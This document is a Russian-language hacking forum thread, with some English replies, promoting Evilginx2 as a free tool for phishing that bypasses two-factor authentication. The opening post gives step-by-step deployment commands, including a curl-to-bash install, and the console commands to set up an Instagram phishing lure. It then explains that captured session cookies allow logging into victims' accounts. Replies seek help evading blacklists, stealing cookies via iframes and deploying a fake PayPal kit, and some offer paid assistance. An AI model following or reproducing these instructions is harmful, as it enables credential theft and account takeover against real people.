Статья Evilginx2 - тула для фишинга 2FA абсолютно бесплатно

[pablo]

Evilginx2 - тула для фишинга от kgretzky. Киллер фича - это возможность забайпасить 2-fa. Для пользователя страница выглядит абсолютно идентично оригинальной, так как по факту это оригинальная страница и есть. Весь код страницы проксируется через nginx, а прокси подменяет все урлы которые есть в теле ответа, на урлы контролируемого домена, за счет чего все кнопки работают корректно, но редиректят на наш сервер.

Первая версия Evilginx была тоже хороша https://github.com/kgretzky/evilginx, но недостатками была сложность установки и конфигурирования, в результате сейчас проект не поддерживается, и многие конфиги не работают, хотя только на первой версии проекта у меня получалось допилить applied конфиг до рабочей версии, могу выпустить отдельный пост про это.

Прелесть второй версии в том, что все работает в докере, что убирает весь геморрой с конфигурированием, и оставляет нам править простецкий yml файлик

Список поддержвиаемых сервисов для фишинга, из коробки, впечатляет:

И так в посте покажу процес установки и разворачивания:

• Покупаем домен и vps
• Настраиваем ns запись на свою VPS (Может занят до суток)

Установка:

curl https://get.docker.com/ | bash
git clone https://github.com/kgretzky/evilginx2
cd evilginx2
docker build . -t evilginx2
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Интерактивный шелл который открылся умеет help. С этого момента можно выбрать любой из сервисов, я покажу на примере instagram:

config domain example.org # подставить свое
config ip 10.0.0.23 # подставить свое
phishlets hostname instagram insta2.exmaple.org # подставить свое
phishlets enable instagram
lures create instagram
lures get-url 0
https://www.insta2.example.org/oEnQzLHb

По ссылке для фишинга(https://www.insta2.example.org/oEnQzLHb) полная копия оригинального instagram с возможностью авторизации 2fa.

Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки, и воспользоваться ими для входа в сервис.

 

[kali]

добавить туда палку?

 

[m00r]

автор крут
статьи тоже

 

[over1ord]

Были бы под него еще нужные фишлеты, а то фб/линкендин - кому они нужны в ру. Вот в первой версии evilginx был гмаил...
А про руссифицированные фишлеты я вообще молчу - мечты.

 

[TrIpld9wo]

я правильно понимаю , что все запросы будут идти с ип адреса сервера и он быстро улетит в блэк?

 

[goffyy]

Это не от него случаем ?


Объясню, есть фейк ПП он в докере....не как не получается развернуть грамотно. достался по братски.... вот подумал может он с этим скриптом должен как то работать ?*

 

[kerberos]

Посмотреть вложение 5219Это не от него случаем ?

Не то, евиль написан на golang а у тебя там php файлы видны...

 

[goffyy]

там крутой фейк пп в докере кто может помочь с установкой

 

[kali]

Посмотреть вложение 5219Это не от него случаем ?


Объясню, есть фейк ПП он в докере....не как не получается развернуть грамотно. достался по братски.... вот подумал может он с этим скриптом должен как то работать ?*

просто о докере habr.com/post/310460/

 

[SpirtRoyal]

там крутой фейк пп в докере кто может помочь с установкой

pishi v pm - sdelaem

 

[hardknocklife]

Can someone please help install evilginx2 for me, as well as teach how to make custom phishlets and create a panel where the results will be displayed? Your time will be rewarded

 

[jorah]

ТС спасибо за статью.
Комрады, есть вопросы.
Есть ли возможность запускать несколько сессий под разные фишлеты и писать их в лог отдельно для каждого ip ?
Есть ли возможность пусть через костыли запускать каждое соединение через отдельный сокс ?
Если у юзера скажем есть сессия и все это дело дергать через ифрейм, получится ли перехватить куки ?

 

[Dendy]

на 8м шаге, репы недоступны.
кто знает куда перезалились ?

Step 8/16 : RUN go build -o ./bin/evilginx main.go
 ---> Running in d00c12b3e3a9
# github.com/kgretzky/evilginx2/vendor/github.com/mattn/go-isatty
vendor/github.com/mattn/go-isatty/isatty_tcgets.go:10:29: IsTerminal redeclared in this block
    previous declaration at vendor/github.com/mattn/go-isatty/isatty_linux.go:14:29
# github.com/kgretzky/evilginx2/vendor/github.com/gorilla/mux
vendor/github.com/gorilla/mux/context_native.go:10:51: contextGet redeclared in this block
    previous declaration at vendor/github.com/gorilla/mux/context.go:8:51
vendor/github.com/gorilla/mux/context_native.go:14:57: contextSet redeclared in this block
    previous declaration at vendor/github.com/gorilla/mux/context.go:12:57
# github.com/kgretzky/evilginx2/vendor/github.com/miekg/dns
vendor/github.com/miekg/dns/zcompress.go:10:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:13:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:16:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:22:18: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:26:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:29:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:32:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:35:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:38:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:41:17: undefined: compressionLenHelper
vendor/github.com/miekg/dns/zcompress.go:41:17: too many errors

 

[kerberos]

на 8м шаге, репы недоступны.
кто знает куда перезалились ?

Ты не подгрузил реки. зайди в папку и сделай
go get ./...
и должно заработать

 

[Dendy]

Ты не подгрузил реки. зайди в папку и сделай
go get ./...
и должно заработать

какая то проблема с го. сделал через бинарник.

 

[hardknocklife]

Guys, how do you create a web panel for evilginx, for example, modlish, to view the results?

 

[wealthyxyear]

[QUOTE = "hardknocklife, post: 187600, member: 184449"]
Guys, how do you create a web panel for evilginx, for example, modlish, to view the results?
[/QUOTE]
A.
A.can we please get help how to host this project

 

[givirus]

How to make custom phishlets and create a panel where the results will be displayed? It is there any tutorial?

 

[hardknocklife]

[QUOTE = "givirus, post: 192049, member: 188500"]
How to make custom phishlets and create a panel where the results will be displayed? It is there any tutorial?
[/ QUOTE]
no I'm looking for the sale ... I had one panel made but it's not all that

 

[pewpewpew]

I will soon be writing an article about custom phishlets and simple WP. Wait a bit please